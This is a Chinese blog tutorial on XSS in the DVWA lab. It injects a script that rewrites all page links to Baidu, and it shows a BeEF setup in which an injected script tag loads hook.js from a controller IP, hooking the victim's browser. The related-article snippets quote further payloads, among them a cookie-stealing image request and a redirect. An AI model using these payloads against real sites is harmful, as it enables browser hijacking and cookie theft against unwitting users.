xss跳转代码_XSS漏洞(恶意链接)

最新推荐文章于 2024-05-10 02:04:57 发布
最新推荐文章于 2024-05-10 02:04:57 发布
阅读量1.3k 收藏 3
点赞数
文章标签: xss跳转代码

一、环境:DVWA

二、修改网页链接

1、点击下面的网址,访问的是不同的内容

8381ef5fae2de9525b4d71584f98e8d6.png

15a5ed65f8fe1ea4cedb20a3855958bd.png

f7913f8d216e35f1d0643dffacae74e6.png

2、通过xss漏洞,修改这些网址都指向百度

window.onload:当窗口加载时,执行匿名函数

<script>

window.οnlοad=function(){

var link=document.getElementsByTagName("a");

for(j=0;j<link.length;j++){

link[j].href="百度一下,你就知道";

}

}

</script>

3、在漏洞处输入上面代码,提交

581d7da6b78953b6ac9ece453f544abc.png

4、点击这些网址,都是跳转到百度,查看审查元素

228a4983da986f8a1f6c220de1abe57a.png

三、生成恶意链接(kali攻击,win7被攻击)

1、kali启动beff-xss

2、启动apache服务:service apache2 start

3、cd /var/www/html

修改index.html

<script src="http://控制端ip:3000/hook.js"></script>

d9ceedc842ea75557add6f9b4c4f3b48.png

4、在xss漏洞处,输入<script src="http://控制端ip:3000/hook.js"></script>,提交

67a0cc8752043647ce5b6d16c643b1c0.png

5、被控端上线

ae3739c9b5e5e7eb415c7c99d7db604e.png

禁止非法,后果自负

欢迎关注公众号:web安全工具库

79b86809b58696a487d61814086e90a0.png
weixin_39994806
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS(跨站脚本攻击)攻击学习
qq_26002283的博客
04-26 499
XSS分类: 1)反射XSS (简单的把用户输入的数据反射给浏览器,也就是说,黑客往往需要诱使用户点击一个恶意链接才能攻击成功。) 2)存储XSS (把用户输入的数据存储到服务器端,每个点击的用户都可能被攻击。) 3)DOM based XSS (从效果上来说DOMXSS可以看做为反射,通过修改页面DOM节点形成的XSS 我们称之为 DOM based XSSXSS攻击成功后,攻击者能...
漏洞-跨站脚本攻击
吴大侠的博客
12-19 694
漏洞-跨站脚本攻击 1.1 简介 XSS :Cross Site Scripting,为不和层叠样式表(Cascading Style Sheets, CSS) 的缩写混淆,故将跨站脚本攻击缩写为XSS恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中 Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。在一开始的时候,这种攻击的演示案例是跨域的,所以叫"跨站脚本"。 攻击原理:XSS的原理是WEB应用程序混淆了用户提交的数据和JS脚本的代码边界,导致 浏览器把用
网络安全最新web安全之XSS攻击原理及防范(1),2024年最新微信小程序页面跳转方法总结
最新发布
2401_84545213的博客
05-10 372
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
xss漏洞
俺当日记写
07-13 1031
一、通过xxs可以进行那些操作 1.挂马 当发现网站页面有xxs漏洞时,我们可以利用工具制作木马 2.获取cookie 写一段获取别人cookie的脚本,利用xxs插入到网页中,这样被人在登录时,代码就是被执行,cookie就会发送到我的邮箱里。恶意脚本代码插入JS代码实现网页跳转 跳转个别页面 也会影响访问量在网页中插入视频,内网实现特殊效果这种方式不会使用简单的一句代码,要使 有真正的破坏性,会在使用来连接外部的脚本 攻击者会使用恶意代码通过xxs漏洞获取用户cookie 盗取用户的cookie 攻击
漏洞篇(XSS 跨站脚本攻击一)
m0_58001548的博客
04-08 2022
1、Cookie 概述:Cookie 是一些数据, 存储于你电脑上的文本文件中。当 web 服务器向浏览器发送 web 页面时,在连接关闭后,服务端不会记录用户的信息。Cookie 的作用就是用于解决 "如何记录客户端的用户信息":(1)、当用户访问 web 页面时,他的名字可以记录在 cookie 中。2)、在用户下一次访问该页面时,可以在 cookie 中读取用户访问记录。Cookie 以键值对形式存储,如下所示:
xss跳转代码_XSS之Beef神器
weixin_39821189的博客
11-20 474
No.1声明由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。No.2前言Beef 是目前最为流行的 web 框架攻击平台,...
YXcms-含有存储XSS漏洞的源码包(1).zip
12-31
同时,如果你是YXcms的用户,应警惕不寻常的页面行为,如异常的弹窗、链接跳转等,这些都是XSS攻击的常见表现。 总结来说,存储XSS漏洞是Web应用程序安全的重要威胁,需要开发者具备足够的安全意识和技术知识,以...
DOM-XSS漏洞的挖掘与攻击面延伸.pptx
10-15
DOM-XSS 漏洞是一种常见的安全漏洞,它可以导致攻击者inject恶意脚本,获取敏感信息,从而危害用户的安全。下面是 DOM-XSS 漏洞的挖掘与攻击面延伸技术创新知识点: 1. DOM-XSS 漏洞的常见位置: * URL 代入页面:...
PHP劫持跳转代码
07-24
当我们谈论"PHP劫持跳转代码"时,这通常涉及到一种安全问题,即恶意攻击者利用PHP代码来控制或篡改网站的行为,使得用户在访问特定页面时被强制跳转到其他不受信任的网站。 PHP劫持跳转通常是通过注入恶意代码实现...
KNR-XSS-Payloads:XSS的有效负载
05-05
"KNR-XSS-Payloads"是一个专门收集和整理XSS有效载荷的资源库,为安全研究人员和开发人员提供了一个测试和了解XSS漏洞的工具。 XSS攻击可以分为三种主要类存储、反射和DOM。每种类XSS都有其特定的...
Python-XSSFinder用于检测网站中反射的xss工具集
08-10
XSSFinder可以自动发送请求到目标网站,尝试在输入字段中注入各种XSS payload,检测是否存在反射XSS漏洞。 2. **多样的payload库**: 工具内置了丰富的XSS测试字符串,覆盖多种可能的XSS攻击方式,包括编码、...
0、漏洞说明.docx
04-21
12. Django debug page XSS漏洞(CVE-2017-12794):在Django的调试页面中存在跨站脚本(XSS漏洞,攻击者可以注入恶意脚本,影响用户浏览器安全。 13. Django任意URL跳转漏洞(CVE-2018-14574):此漏洞可能导致...
完整的漏洞赏金备忘单.pdf
10-06
1. **XSS(跨站脚本攻击)**:XSS攻击是通过注入可执行的脚本代码到网页中,使得用户在浏览网页时被执行,可能导致窃取用户数据、会话劫持等。防范措施包括输入验证、输出编码和使用HTTP头部的Content-Security-...
asp.net最新0day_exp
12-16
1. **代码注入**:攻击者可能会利用0day漏洞在应用程序中注入恶意代码,比如SQL注入或跨站脚本(XSS)攻击,获取敏感信息或操控用户行为。 2. **权限提升**:通过0day漏洞,攻击者可能获得超出预期的权限,如管理员...
URL跳转奇葩姿势详解.pdf
01-02
- **反射XSS**:通过构造恶意链接,使用户在访问时触发JavaScript代码执行。 - **其他猥琐姿势**:可能包括隐藏的URL参数、多级跳转等。 3. **其他跳转方式** - **代码逻辑缺陷**:编程错误可能导致意外的跳转。...
PHP代码审计入门指南1
08-04
- **反序列化漏洞**:恶意序列化数据可能导致代码执行或数据篡改。 - **LDAP注入**:对LDAP(轻量级目录访问协议)查询的用户输入处理不当可能导致控制服务器的行为。 了解和熟悉这些常见漏洞的原理和防范措施,是...
XSS漏洞学习笔记
qi_SJQ_的博客
12-31 2581
xss学习笔记
DVWA XSS
weixin_46429206的博客
12-03 186
低 弹窗: <script>alert('xss')</script> <a href=’’ onclick=alert(‘你是傻子吧!’)>美女图片</a> 重定向:<script>window.location="http://www.4399.com"</script> 点击forward跳转下一界面 Cookie:<script>new Image().src=”http://192.168.116.1
xss漏洞之——漏洞利用
wsnbbz的博客
03-04 1195
1.获取cookie进行无密码登陆 原理 网页被植入网页被植入xss脚本,普通用户访问此网页时,会自动将用户本地的cookie缓存发送到指定远端服务器 利用 (1)首先登陆一个页面,抓包获取cookie (2)复制此页面里任一选项的url,重启浏览器后直接访问此url,抓包修改cookie为上面获取的登陆成功后的cookie (3)页面登陆成功,无需密码 2.利用XSS漏洞获取管理员权限(获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值